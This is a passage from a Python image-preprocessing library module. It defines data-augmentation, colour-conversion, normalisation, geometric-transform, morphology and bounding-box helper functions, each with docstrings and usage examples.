results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# image = tf.image.random_brightness(image, max_delta=32. / 255.)
# image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
# image = tf.image.random_hue(image, max_delta=0.032)
# image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
def brightness(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Non-negative real number. Default value is 1.
- Smaller than 1 means brighter.
- If `is_random` is True, gamma is drawn uniformly from (1-gamma, 1+gamma).
gain : float
The constant multiplier. Default value is 1.
is_random : boolean
If True, randomly change brightness. Default is False.
Returns
-------
numpy.array
A processed image.
References
-----------
- `skimage.exposure.adjust_gamma <http://scikit-image.org/docs/dev/api/skimage.exposure.html>`__
- `chinese blog <http://www.cnblogs.com/denny402/p/5124402.html>`__
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
x = exposure.adjust_gamma(x, gamma, gain)
return x
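# A minimal usage sketch for ``brightness`` (hedged example; ``im`` is assumed to be a float image in [0, 1]):
#
# >>> im_bright = brightness(im, gamma=0.5, is_random=False)   # gamma < 1 brightens
# >>> im_rand = brightness(im, gamma=0.5, is_random=True)      # gamma drawn from (0.5, 1.5)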
def brightness_multi(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of multiply images, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.brightness``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
results = []
for data in x:
results.append(exposure.adjust_gamma(data, gamma, gain))
return np.asarray(results)
def illumination(x, gamma=1., contrast=1., saturation=1., is_random=False):
"""Perform illumination augmentation for a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Change brightness (the same with ``tl.prepro.brightness``)
- if is_random=False, one float number; smaller than one means brighter, greater than one means darker.
- if is_random=True, tuple of two float numbers, (min, max).
contrast : float
Change contrast.
- if is_random=False, one float number; smaller than one means less contrast (more blur).
- if is_random=True, tuple of two float numbers, (min, max).
saturation : float
Change saturation.
- if is_random=False, one float number; smaller than one means less saturated.
- if is_random=True, tuple of two float numbers, (min, max).
is_random : boolean
If True, randomly change illumination. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random
>>> x = tl.prepro.illumination(x, gamma=(0.5, 5.0), contrast=(0.3, 1.0), saturation=(0.7, 1.0), is_random=True)
Non-random
>>> x = tl.prepro.illumination(x, 0.5, 0.6, 0.8, is_random=False)
"""
if is_random:
if not (len(gamma) == len(contrast) == len(saturation) == 2):
raise AssertionError("if is_random = True, the arguments are (min, max)")
## random change brightness # small --> brighter
illum_settings = np.random.randint(0, 3) # 0-brighter, 1-darker, 2 keep normal
if illum_settings == 0: # brighter
gamma = np.random.uniform(gamma[0], 1.0) # (.5, 1.0)
elif illum_settings == 1: # darker
gamma = np.random.uniform(1.0, gamma[1]) # (1.0, 5.0)
else:
gamma = 1
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
# tl.logging.info("using contrast and saturation")
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(np.random.uniform(contrast[0], contrast[1])) #0.3,0.9))
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(np.random.uniform(saturation[0], saturation[1])) # (0.7,1.0))
im_ = np.array(image) # PIL -> array
else:
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(contrast)
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(saturation)
im_ = np.array(image) # PIL -> array
return np.asarray(im_)
def rgb_to_hsv(rgb):
"""Input RGB image [0~255] return HSV image [0~1].
Parameters
------------
rgb : numpy.array
An image with values between 0 and 255.
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.rgb_to_hsv
# r,g,b should be a numpy arrays with values between 0 and 255
# rgb_to_hsv returns an array of floats between 0.0 and 1.0.
rgb = rgb.astype('float')
hsv = np.zeros_like(rgb)
# in case an RGBA array was passed, just copy the A channel
hsv[..., 3:] = rgb[..., 3:]
r, g, b = rgb[..., 0], rgb[..., 1], rgb[..., 2]
maxc = np.max(rgb[..., :3], axis=-1)
minc = np.min(rgb[..., :3], axis=-1)
hsv[..., 2] = maxc
mask = maxc != minc
hsv[mask, 1] = (maxc - minc)[mask] / maxc[mask]
rc = np.zeros_like(r)
gc = np.zeros_like(g)
bc = np.zeros_like(b)
rc[mask] = (maxc - r)[mask] / (maxc - minc)[mask]
gc[mask] = (maxc - g)[mask] / (maxc - minc)[mask]
bc[mask] = (maxc - b)[mask] / (maxc - minc)[mask]
hsv[..., 0] = np.select([r == maxc, g == maxc], [bc - gc, 2.0 + rc - bc], default=4.0 + gc - rc)
hsv[..., 0] = (hsv[..., 0] / 6.0) % 1.0
return hsv
def hsv_to_rgb(hsv):
"""Input HSV image [0~1] return RGB image [0~255].
Parameters
-------------
hsv : numpy.array
An image with values between 0.0 and 1.0
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.hsv_to_rgb
# h,s should be a numpy arrays with values between 0.0 and 1.0
# v should be a numpy array with values between 0.0 and 255.0
# hsv_to_rgb returns an array of uints between 0 and 255.
rgb = np.empty_like(hsv)
rgb[..., 3:] = hsv[..., 3:]
h, s, v = hsv[..., 0], hsv[..., 1], hsv[..., 2]
i = (h * 6.0).astype('uint8')
f = (h * 6.0) - i
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f))
i = i % 6
conditions = [s == 0.0, i == 1, i == 2, i == 3, i == 4, i == 5]
rgb[..., 0] = np.select(conditions, [v, q, p, p, t, v], default=v)
rgb[..., 1] = np.select(conditions, [v, v, v, q, p, p], default=t)
rgb[..., 2] = np.select(conditions, [v, p, t, v, v, q], default=p)
return rgb.astype('uint8')
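# A minimal round-trip sketch for ``rgb_to_hsv``/``hsv_to_rgb`` (hedged example; ``im`` is
# assumed to be an RGB uint8 array with values in [0, 255]):
#
# >>> hsv = rgb_to_hsv(im)                        # HSV channels in [0, 1], value channel up to 255
# >>> hsv[..., 0] = (hsv[..., 0] + 0.1) % 1.0     # e.g. rotate the hue channel by 0.1
# >>> im2 = hsv_to_rgb(hsv)                       # back to uint8 RGB in [0, 255]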
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, adds an offset to the hue channel, converts back to RGB, and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__ and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue value.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=True)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb
# # contrast
# def constant(x, cutoff=0.5, gain=10, inv=False, is_random=False):
# # TODO
# x = exposure.adjust_sigmoid(x, cutoff=cutoff, gain=gain, inv=inv)
# return x
#
# def constant_multi():
# #TODO
# pass
def imresize(x, size=None, interp='bicubic', mode=None):
"""Resize an image by given output size and method.
Warning, this function will rescale the value to [0, 255].
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
size : list of 2 int or None
For height and width.
interp : str
Interpolation method for re-sizing (`nearest`, `lanczos`, `bilinear`, `bicubic` (default) or `cubic`).
mode : str
The PIL image mode (`P`, `L`, etc.) to convert arr before resizing.
Returns
-------
numpy.array
A processed image.
References
------------
- `scipy.misc.imresize <https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html>`__
"""
if size is None:
size = [100, 100]
if x.shape[-1] == 1:
# greyscale
x = scipy.misc.imresize(x[:, :, 0], size, interp=interp, mode=mode)
return x[:, :, np.newaxis]
elif x.shape[-1] == 3:
# rgb, bgr ..
return scipy.misc.imresize(x, size, interp=interp, mode=mode)
else:
raise Exception("Unsupported channel %d" % x.shape[-1])
# value scale
def pixel_value_scale(im, val=0.9, clip=(-np.inf, np.inf), is_random=False):
"""Scales each value in the pixels of the image.
Parameters
-----------
im : numpy.array
An image.
val : float
The scale value for changing pixel value.
- If is_random=False, multiply this value with all pixels.
- If is_random=True, multiply a value between [1-val, 1+val] with all pixels.
clip : tuple of 2 numbers
The minimum and maximum value.
is_random : boolean
If True, see ``val``.
Returns
-------
numpy.array
A processed image.
Examples
----------
Random
>>> im = pixel_value_scale(im, 0.1, [0, 255], is_random=True)
Non-random
>>> im = pixel_value_scale(im, 0.9, [0, 255], is_random=False)
"""
if is_random:
scale = 1 + np.random.uniform(-val, val)
im = im * scale
else:
im = im * val
if len(clip) == 2:
im = np.clip(im, clip[0], clip[1])
else:
raise Exception("clip : tuple of 2 numbers")
return im
# normailization
def samplewise_norm(
x, rescale=None, samplewise_center=False, samplewise_std_normalization=False, channel_index=2, epsilon=1e-7
):
"""Normalize an image by rescale, samplewise centering and samplewise centering in order.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rescale : float
Rescaling factor. If None or 0, no rescaling is applied, otherwise we multiply the data by the value provided (before applying any other transformation)
samplewise_center : boolean
If True, set each sample mean to 0.
samplewise_std_normalization : boolean
If True, divide each input by its std.
epsilon : float
A small positive value added to the standard deviation to avoid division by zero.
Returns
-------
numpy.array
A processed image.
Examples
--------
>>> x = samplewise_norm(x, samplewise_center=True, samplewise_std_normalization=True)
>>> print(x.shape, np.mean(x), np.std(x))
(160, 176, 1), 0.0, 1.0
Notes
------
When samplewise_center and samplewise_std_normalization are True:
- For a greyscale image, every pixel has the mean of the whole image subtracted and is divided by the image's std.
- For an RGB image, every pixel has the mean of its own channels subtracted and is divided by their std, i.e. each pixel's channels end up with mean 0 and std 1.
"""
if rescale:
x *= rescale
if x.shape[channel_index] == 1:
# greyscale
if samplewise_center:
x = x - np.mean(x)
if samplewise_std_normalization:
x = x / np.std(x)
return x
elif x.shape[channel_index] == 3:
# rgb
if samplewise_center:
x = x - np.mean(x, axis=channel_index, keepdims=True)
if samplewise_std_normalization:
x = x / (np.std(x, axis=channel_index, keepdims=True) + epsilon)
return x
else:
raise Exception("Unsupported channels %d" % x.shape[channel_index])
def featurewise_norm(x, mean=None, std=None, epsilon=1e-7):
"""Normalize every pixels by the same given mean and std, which are usually
compute from all examples.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
mean : float
Value for subtraction.
std : float
Value for division.
epsilon : float
A small positive value added to the standard deviation to avoid division by zero.
Returns
-------
numpy.array
A processed image.
"""
if mean:
x = x - mean
if std:
x = x / (std + epsilon)
return x
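# A minimal usage sketch for ``featurewise_norm`` (hedged example; ``X_train`` is assumed to be
# a batch of images from which the dataset-wide statistics are computed):
#
# >>> mean, std = np.mean(X_train), np.std(X_train)
# >>> x = featurewise_norm(x, mean=mean, std=std)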
# whitening
def get_zca_whitening_principal_components_img(X):
"""Return the ZCA whitening principal components matrix.
Parameters
-----------
x : numpy.array
Batch of images with dimension of [n_example, row, col, channel] (default).
Returns
-------
numpy.array
A processed image.
"""
flatX = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[2] * X.shape[3]))
tl.logging.info("zca : computing sigma ..")
sigma = np.dot(flatX.T, flatX) / flatX.shape[0]
tl.logging.info("zca : computing U, S and V ..")
U, S, _ = linalg.svd(sigma) # USV
tl.logging.info("zca : computing principal components ..")
principal_components = np.dot(np.dot(U, np.diag(1. / np.sqrt(S + 10e-7))), U.T)
return principal_components
def zca_whitening(x, principal_components):
"""Apply ZCA whitening on an image by given principal components matrix.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
principal_components : matrix
Matrix from ``get_zca_whitening_principal_components_img``.
Returns
-------
numpy.array
A processed image.
"""
flatx = np.reshape(x, (x.size))
# tl.logging.info(principal_components.shape, x.shape) # ((28160, 28160), (160, 176, 1))
# flatx = np.reshape(x, (x.shape))
# flatx = np.reshape(x, (x.shape[0], ))
# tl.logging.info(flatx.shape) # (160, 176, 1)
whitex = np.dot(flatx, principal_components)
x = np.reshape(whitex, (x.shape[0], x.shape[1], x.shape[2]))
return x
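# A minimal usage sketch for the ZCA whitening pair (hedged example; ``X_train`` is assumed to be
# a batch with shape [n_example, row, col, channel]):
#
# >>> pc = get_zca_whitening_principal_components_img(X_train)
# >>> X_white = np.asarray([zca_whitening(im, pc) for im in X_train])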
# developing
# def barrel_transform(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
#
# def barrel_transform_multi(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
# channel shift
def channel_shift(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of an image, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Intensity of shifting.
is_random : boolean
If True, randomly shift. Default is False.
channel_index : int
Index of channel. Default is 2.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
x = np.rollaxis(x, channel_index, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
# x = np.rollaxis(x, channel_index, 0)
# min_x, max_x = np.min(x), np.max(x)
# channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
# for x_channel in x]
# x = np.stack(channel_images, axis=0)
# x = np.rollaxis(x, 0, channel_index+1)
# return x
def channel_shift_multi(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of images with the same arguments, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Usually used for image segmentation, where x=[X, Y] and X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.channel_shift``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
results = []
for data in x:
data = np.rollaxis(data, channel_index, 0)
min_x, max_x = np.min(data), np.max(data)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in data]
data = np.stack(channel_images, axis=0)
data = np.rollaxis(data, 0, channel_index + 1)
results.append(data)
return np.asarray(results)
# noise
def drop(x, keep=0.5):
"""Randomly set some pixels to zero by a given keeping probability.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] or [row, col].
keep : float
The keeping probability (0, 1), the lower more values will be set to zero.
Returns
-------
numpy.array
A processed image.
"""
if len(x.shape) == 3:
if x.shape[-1] == 3: # color
img_size = x.shape
mask = np.random.binomial(n=1, p=keep, size=x.shape[:-1])
for i in range(3):
x[:, :, i] = np.multiply(x[:, :, i], mask)
elif x.shape[-1] == 1: # greyscale image
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
elif len(x.shape) in (1, 2): # greyscale matrix (image) or vector
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
return x
# x = np.asarray([[1,2,3,4,5,6,7,8,9,10],[1,2,3,4,5,6,7,8,9,10]])
# x = np.asarray([x,x,x,x,x,x])
# x.shape = 10, 4, 3
# tl.logging.info(x)
# # exit()
# tl.logging.info(x.shape)
# # exit()
# tl.logging.info(drop(x, keep=1.))
# exit()
# manual transform
def transform_matrix_offset_center(matrix, x, y):
"""Return transform matrix offset center.
Parameters
----------
matrix : numpy.array
Transform matrix.
x and y : 2 int
Size of image.
Returns
-------
numpy.array
The transform matrix.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_transform(x, transform_matrix, channel_index=2, fill_mode='nearest', cval=0., order=1):
"""Return transformed images by given ``transform_matrix`` from ``transform_matrix_offset_center``.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
transform_matrix : numpy.array
Transform matrix (offset center), can be generated by ``transform_matrix_offset_center``
channel_index : int
Index of channel, default 2.
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
- `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shift``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
x = np.rollaxis(x, channel_index, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [
ndi.interpolation.affine_transform(
x_channel, final_affine_matrix, final_offset, order=order, mode=fill_mode, cval=cval
) for x_channel in x
]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
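# A minimal sketch of composing the manual-transform helpers (hedged example; it reproduces the
# core of ``rotation`` for an image ``im`` of shape [row, col, channel]):
#
# >>> theta = np.pi / 180 * 30  # 30 degrees
# >>> rot = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])
# >>> h, w = im.shape[0], im.shape[1]
# >>> m = transform_matrix_offset_center(rot, h, w)
# >>> im_rot = apply_transform(im, m, channel_index=2, fill_mode='nearest')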
def projective_transform_by_points(
x, src, dst, map_args=None, output_shape=None, order=1, mode='constant', cval=0.0, clip=True,
preserve_range=False
):
"""Projective transform by given coordinates, usually 4 coordinates.
see `scikit-image <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
src : list or numpy.array
The original coordinates, usually 4 coordinates of (width, height).
dst : list or numpy.array
The coordinates after transformation; the number of coordinates is the same as src.
map_args : dictionary or None
Keyword arguments passed to inverse map.
output_shape : tuple of 2 int
Shape of the output image generated. By default the shape of the input image is preserved. Note that, even for multi-band images, only rows and columns need to be specified.
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
mode : str
One of `constant` (default), `edge`, `symmetric`, `reflect` or `wrap`.
Points outside the boundaries of the input are filled according to the given mode. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
Returns
-------
numpy.array
A processed image.
Examples
--------
Assume X is an image from CIFAR-10, i.e. shape == (32, 32, 3)
>>> src = [[0,0],[0,32],[32,0],[32,32]] # [w, h]
>>> dst = [[10,10],[0,32],[32,0],[32,32]]
>>> x = tl.prepro.projective_transform_by_points(X, src, dst)
References
-----------
- `scikit-image : geometric transformations <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__
- `scikit-image : examples <http://scikit-image.org/docs/dev/auto_examples/index.html>`__
"""
if map_args is None:
map_args = {}
# if type(src) is list:
if isinstance(src, list): # convert to numpy
src = np.array(src)
# if type(dst) is list:
if isinstance(dst, list):
dst = np.array(dst)
if np.max(x) > 1: # convert to [0, 1]
x = x / 255
m = transform.ProjectiveTransform()
m.estimate(dst, src)
warped = transform.warp(
x, m, map_args=map_args, output_shape=output_shape, order=order, mode=mode, cval=cval, clip=clip,
preserve_range=preserve_range
)
return warped
# Numpy and PIL
def array_to_img(x, dim_ordering=(0, 1, 2), scale=True):
"""Converts a numpy array to PIL image object (uint8 format).
Parameters
----------
x : numpy.array
An image with dimension of 3 and channels of 1 or 3.
dim_ordering : tuple of 3 int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
scale : boolean
If True, converts image to [0, 255] from any range of value like [-1, 2]. Default is True.
Returns
-------
PIL.image
An image.
References
-----------
`PIL Image.fromarray <http://pillow.readthedocs.io/en/3.1.x/reference/Image.html?highlight=fromarray>`__
"""
# if dim_ordering == 'default':
# dim_ordering = K.image_dim_ordering()
# if dim_ordering == 'th': # theano
# x = x.transpose(1, 2, 0)
x = x.transpose(dim_ordering)
if scale:
x += max(-np.min(x), 0)
x_max = np.max(x)
if x_max != 0:
# tl.logging.info(x_max)
# x /= x_max
x = x / x_max
x *= 255
if x.shape[2] == 3:
# RGB
return PIL.Image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
return PIL.Image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise Exception('Unsupported channel number: ', x.shape[2])
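# A minimal usage sketch for ``array_to_img`` (hedged example; ``x`` is assumed to be a float array
# of shape [row, col, 3] with an arbitrary value range, and 'out.png' is a hypothetical output path):
#
# >>> img = array_to_img(x, scale=True)   # rescales to [0, 255] and returns a PIL.Image
# >>> img.save('out.png')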
def find_contours(x, level=0.8, fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value, returns list of (n, 2)-ndarrays
see `skimage.measure.find_contours <http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours>`__.
Parameters
------------
x : 2D ndarray of double.
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str
Either `low` or `high`. Indicates whether array elements below the given level value are to be considered fully-connected (and hence elements above the value will only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : str
Either `low` or `high`. Indicates whether the output contours will produce positively-oriented polygons around islands of low- or high-valued elements. If `low` then contours will wind counter-clockwise around elements below the iso-value. Alternately, this means that low-valued elements are always on the left of the contour.
Returns
--------
list of (n,2)-ndarrays
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
return skimage.measure.find_contours(
x, level, fully_connected=fully_connected, positive_orientation=positive_orientation
)
def pt2map(list_points=None, size=(100, 100), val=1):
"""Inputs a list of points, return a 2D image.
Parameters
--------------
list_points : list of 2 int
[[x, y], [x, y]..] for point coordinates.
size : tuple of 2 int
(w, h) for output size.
val : float or int
For the contour value.
Returns
-------
numpy.array
An image.
"""
if list_points is None:
raise Exception("list_points : list of 2 int")
i_m = np.zeros(size)
if len(list_points) == 0:
return i_m
for xx in list_points:
for x in xx:
# tl.logging.info(x)
i_m[int(np.round(x[0]))][int(np.round(x[1]))] = val
return i_m
def binary_dilation(x, radius=3):
"""Return fast binary morphological dilation of an image.
see `skimage.morphology.binary_dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_dilation>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_dilation(x, selem=mask)
return x
def dilation(x, radius=3):
"""Return greyscale morphological dilation of an image,
see `skimage.morphology.dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.dilation>`__.
Parameters
-----------
x : 2D array
A greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = _dilation(x, selem=mask)
return x
def binary_erosion(x, radius=3):
"""Return binary morphological erosion of an image,
see `skimage.morphology.binary_erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_erosion>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_erosion(x, selem=mask)
return x
def erosion(x, radius=3):
"""Return greyscale morphological erosion of an image,
see `skimage.morphology.erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.erosion>`__.
Parameters
-----------
x : 2D array
A greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = _erosion(x, selem=mask)
return x
def obj_box_coords_rescale(coords=None, shape=None):
"""Scale down a list of coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
Parameters
------------
coords : list of list of 4 ints or None
        For coordinates of more than one image, e.g. [[x, y, w, h], [x, y, w, h], ...].
shape : list of 2 int or None
        [height, width].
Returns
-------
list of list of 4 numbers
A list of new bounding boxes.
Examples
---------
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
>>> print(coords)
[[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
>>> print(coords)
[[0.3, 0.8, 0.5, 1.0]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
>>> print(coords)
[[0.15, 0.4, 0.25, 0.5]]
"""
if coords is None:
coords = []
if shape is None:
shape = [100, 200]
imh, imw = shape[0], shape[1]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x = coord[0] / imw
y = coord[1] / imh
w = coord[2] / imw
h = coord[3] / imh
coords_new.append([x, y, w, h])
return coords_new
def obj_box_coord_rescale(coord=None, shape=None):
"""Scale down one coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
It is the reverse process of ``obj_box_coord_scale_to_pixelunit``.
Parameters
------------
    coord : list of 4 int or None
        One coordinate of one image, e.g. [x, y, w, h].
shape : list of 2 int or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = tl.prepro.obj_box_coord_rescale(coord=[30, 40, 50, 50], shape=[100, 100])
[0.3, 0.4, 0.5, 0.5]
"""
if coord is None:
coord = []
if shape is None:
shape = [100, 200]
return obj_box_coords_rescale(coords=[coord], shape=shape)[0]
def obj_box_coord_scale_to_pixelunit(coord, shape=None):
"""Convert one coordinate [x, y, w (or x2), h (or y2)] in ratio format to image coordinate format.
It is the reverse process of ``obj_box_coord_rescale``.
Parameters
-----------
coord : list of 4 float
        One coordinate of one image [x, y, w (or x2), h (or y2)] in ratio format, i.e. value range [0, 1].
shape : tuple of 2 or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> x, y, x2, y2 = tl.prepro.obj_box_coord_scale_to_pixelunit([0.2, 0.3, 0.5, 0.7], shape=(100, 200, 3))
[40, 30, 100, 70]
"""
if shape is None:
shape = [100, 100]
imh, imw = shape[0:2]
x = int(coord[0] * imw)
x2 = int(coord[2] * imw)
y = int(coord[1] * imh)
y2 = int(coord[3] * imh)
return [x, y, x2, y2]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
# tl.logging.info(coords)
# # [[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
# tl.logging.info(coords)
# # [[0.3, 0.8, 0.5, 1.0]]
# coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
# tl.logging.info(coords)
